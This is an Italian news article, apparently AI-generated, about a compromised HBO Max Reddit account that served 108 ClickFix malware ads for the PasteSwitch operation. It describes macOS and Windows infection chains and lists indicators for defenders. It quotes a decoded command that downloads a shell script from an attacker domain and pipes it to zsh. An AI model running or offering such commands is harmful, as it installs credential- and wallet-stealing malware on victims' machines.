L'account Reddit di HBO Max violato ha diffuso 108 annunci di malware ClickFix

Account Reddit HBO Max violato: 108 annunci ClickFix per Windows e macOS rubano credenziali e crypto via PasteSwitch.

Testo generato da intelligenza artificiale, pubblicato senza revisione umana. Trasparenza IA

L'account Reddit di HBO Max violato ha diffuso 108 annunci di malware ClickFix
Malware

Immagine illustrativa generata con AI

Gli aggressori hanno compromesso l'account Reddit verificato di HBO Max e ne hanno sfruttato l'identità affidabile per distribuire annunci malevoli rivolti agli utenti Windows e macOS.

Un rapporto pubblicato il 14 settembre 2026 descrive 108 annunci malevoli pubblicati tramite l'account u/hbomax nell'arco di circa 48 ore. I ricercatori di Hudson Rock e ADAMnetworks hanno collegato l'attività a PasteSwitch, un'operazione malware più ampia basata sulle tecniche di ingegneria sociale ClickFix.

Gli annunci non si basavano sui consueti download malevoli. Alle vittime veniva invece chiesto di copiare comandi in Windows Run, PowerShell o Terminale di macOS, consentendo agli aggressori di sfruttare la fiducia riposta dagli utenti negli strumenti del sistema operativo.

Un account verificato è diventato un canale di distribuzione del malware

Il primo annuncio identificato promuoveva quella che sembrava un'applicazione HBO Max nativa per macOS. Gli utenti venivano indirizzati a hbomaxx[.]us, un sito progettato per assomigliare a una pagina ufficiale di download del software.

Fare clic sui pulsanti per partecipare o scaricare non avviava un programma di installazione standard. La pagina mostrava invece istruzioni per aprire Terminale e incollare un comando fornito dagli aggressori.

I ricercatori hanno individuato diverse altre destinazioni pubblicizzate tramite l'account Reddit compromesso:

  • 40 annunci reindirizzavano gli utenti a hbomaxx[.]app
  • 36 promuovevano il falso sito di servizi per l'IA e gli sviluppatori codex-craft[.]com
  • 15 puntavano a apple.clean-disk-guide[.]com
  • 11 reindirizzavano a code-desktop[.]com
  • Sei promuovevano hbomax-macos[.]com

La campagna ha quindi raggiunto un pubblico più ampio rispetto alle sole persone alla ricerca del software HBO Max. I suoi richiami prendevano di mira anche sviluppatori, potenziali utenti di servizi di IA e proprietari di Mac in cerca di strumenti per la pulizia del disco o di utilità di sistema.

L'uso di un account aziendale verificato ha conferito agli annunci un forte segnale di legittimità. Gli utenti che avrebbero potuto rifiutare un inserzionista sconosciuto potevano ragionevolmente presumere che i contenuti pubblicati come HBO Max avessero superato sia i controlli del marchio sia quelli della piattaforma.

Non è noto il metodo utilizzato per ottenere il controllo di u/hbomax. Inoltre, non ci sono informazioni confermate che dimostrino la compromissione di altri account o sistemi interni di HBO o Warner Bros. Discovery.

ClickFix trasforma la vittima nel meccanismo di esecuzione

Gli attacchi ClickFix mascherano comunemente l'esecuzione di comandi come una normale procedura di risoluzione dei problemi o di verifica. Una pagina potrebbe sostenere che l'utente debba correggere un errore, completare un CAPTCHA o eseguire un comando per installare un software apparentemente legittimo.

Questo meccanismo cambia il percorso di distribuzione. Invece di chiedere al browser di scaricare un file chiaramente eseguibile, l'aggressore convince la vittima ad aprire un'interfaccia locale affidabile ed eseguire manualmente il payload.

Su macOS, uno dei comandi osservati nella campagna era nascosto mediante codifica Base64. Una volta decodificato, diventava:

export _watch_v2=97d9d8dc;curl -sL "https://ember-bridge[.]com/curl/a44a37519au/setup.sh"| zsh

Il comando crea la variabile d'ambiente _watch_v2, recupera uno script shell da ember-bridge[.]com e inoltra direttamente la risposta all'interprete Z shell. Prima dell'esecuzione non è necessario esaminare lo script scaricato.

Hudson Rock ha identificato quel dominio come un'infrastruttura di distribuzione del malware associata a PasteSwitch. Il backend dell'operazione può selezionare campagne, payload, sistemi operativi e metodi di furto di criptovalute in base alle caratteristiche del visitatore.

Questa flessibilità consente a un'unica operazione pubblicitaria di distribuire catene d'attacco diverse su sistemi Windows e macOS. Permette inoltre agli operatori di alternare il furto di credenziali, il caricamento di malware, le applicazioni fraudolente per i wallet e la manipolazione degli appunti.

I payload per macOS hanno sottratto credenziali e frasi di recupero dei wallet

PasteSwitch ha distribuito MacSync, un infostealer progettato per raccogliere dati sensibili dai dispositivi macOS. Tra i suoi obiettivi figurano le credenziali dei browser, i profili di Firefox, le informazioni di Telegram, Apple Notes e le password di macOS.

Un'altra catena ha installato un malware descritto come “AMOS helper”. Il malware stabilisce la persistenza utilizzando una directory denominata:

.com.apple.accountsd

Il nome ricorda quello di un componente di sistema Apple e potrebbe quindi risultare meno sospetto durante un controllo sommario. Una volta installato, il malware può registrare la macchina presso un'infrastruttura controllata dagli aggressori e accettare ulteriori comandi.

La campagna ha inoltre distribuito applicazioni fraudolente per criptovalute che imitavano Ledger, Trezor Suite ed Exodus. Queste applicazioni cercavano di ottenere le frasi di recupero dei wallet, che possono consentire a un aggressore di prendere il controllo delle criptovalute associate senza dover mantenere l'accesso al computer infetto.

Questi payload distinti possono produrre diversi esiti a partire dalla stessa campagna pubblicitaria. Una vittima potrebbe perdere le credenziali del browser, dati privati delle applicazioni, password di sistema o criptovalute. Il malware persistente potrebbe inoltre fornire un punto d'appoggio per attività successive.

Le catene per Windows hanno usato l'elusione di AMSI e l'esecuzione esclusivamente in memoria

Gli utenti Windows si sono imbattuti in istruzioni che coinvolgevano mshta e PowerShell. Entrambi sono componenti legittimi di Windows, ma gli aggressori li sfruttano frequentemente per eseguire script e recuperare ulteriori fasi dell'attacco.

Una delle catene identificate utilizzava un file poliglotta MP3/HTA: contenuti costruiti in modo da poter essere trattati come più di un tipo di file, a seconda di come venivano elaborati. La catena poteva creare un'attività pianificata, avviare PowerShell a 32 bit e disabilitare l'Antimalware Scan Interface di Microsoft, o AMSI.

Generava quindi un'infrastruttura specifica per la vittima usando il nome del computer e il nome utente. PowerShell offuscato e shellcode caricavano infine Amatera Stealer direttamente in memoria.

Per questa fase finale non era necessario salvare prima un eseguibile convenzionale sul disco. Il caricamento esclusivamente in memoria riduce le tracce disponibili ai controlli di sicurezza che analizzano principalmente i file appena creati, anche se il monitoraggio degli endpoint può comunque rilevare i comportamenti associati.

PasteSwitch ha distribuito anche AnimateClipper e ZigClipper. Questi clipboard hijacker monitorano gli indirizzi di criptovaluta copiati e li sostituiscono con indirizzi controllati dagli aggressori. Poiché le stringhe dei wallet sono lunghe e difficili da verificare a colpo d'occhio, le vittime potrebbero approvare la destinazione modificata senza accorgersi della sostituzione.

I difensori devono cercare comandi, persistenza e infrastrutture

Reddit ha sospeso gli annunci segnalati e ha sottoposto il caso ai propri team Security e Safety. HBO e Warner Bros. Discovery erano state contattate, ma al momento della pubblicazione non avevano ancora risposto.

Non esiste una patch software per il problema principale, perché l'attacco dipende soprattutto dalla compromissione dell'account e dall'ingegneria sociale. Le organizzazioni dovrebbero affiancare la ricerca proattiva sugli endpoint a controlli più rigorosi sugli account aziendali usati per la pubblicità e sui profili social.

I team di sicurezza dovrebbero bloccare o analizzare le connessioni verso:

hbomaxx[.]us
hbomaxx[.]app
codex-craft[.]com
apple.clean-disk-guide[.]com
code-desktop[.]com
hbomax-macos[.]com
ember-bridge[.]com

Sugli endpoint macOS, i difensori dovrebbero cercare la directory di persistenza .com.apple.accountsd, la variabile d'ambiente _watch_v2 e gli accessi a:

/curl/a44a37519au/setup.sh

I dati telemetrici di Windows dovrebbero essere esaminati per individuare esecuzioni anomale di mshta, creazione di attività pianificate, avvii di PowerShell a 32 bit, modifiche ad AMSI, script offuscati, caricamento di shellcode e processi che eseguono payload direttamente in memoria.

Le indagini dovrebbero inoltre considerare gli indicatori associati a MacSync, AMOS helper, Amatera Stealer, AnimateClipper e ZigClipper. Gli utenti di criptovalute potrebbero dover verificare se le frasi di recupero siano state inserite in applicazioni sospette e se gli indirizzi dei wallet copiati siano stati modificati prima delle transazioni.

Le identità verificate non sostituiscono l'analisi dei comandi

Gli utenti dovrebbero considerare potenzialmente ostili tutte le istruzioni di un sito web che chiedono di incollare un comando in Terminale, PowerShell o Windows Run. Questo vale anche quando l'istruzione viene presentata come un CAPTCHA, un programma di installazione o una procedura per correggere un errore.

Le organizzazioni che gestiscono account verificati associati a un marchio dovrebbero implementare l'autenticazione a più fattori resistente al phishing, sostituire le credenziali esposte, revocare le sessioni non riconosciute e riesaminare gli accessi amministrativi. Il monitoraggio dovrebbe segnalare la creazione inattesa di annunci, volumi di campagne insoliti o modifiche effettuate al di fuori dei normali flussi di lavoro.

L'incidente HBO Max dimostra come un'identità compromessa possa colmare il divario di fiducia che normalmente protegge gli utenti dai domini sconosciuti. L'annuncio può sembrare autentico. È comunque il comando incollato a determinare ciò che il computer esegue.

Leggi anche

Fonti

Questo articolo è una rielaborazione originale basata sulle fonti seguenti.

Argomenti correlatiHBO MaxReddit violatomalware ClickFixPasteSwitchMacSyncsicurezza informatica
Torna alla home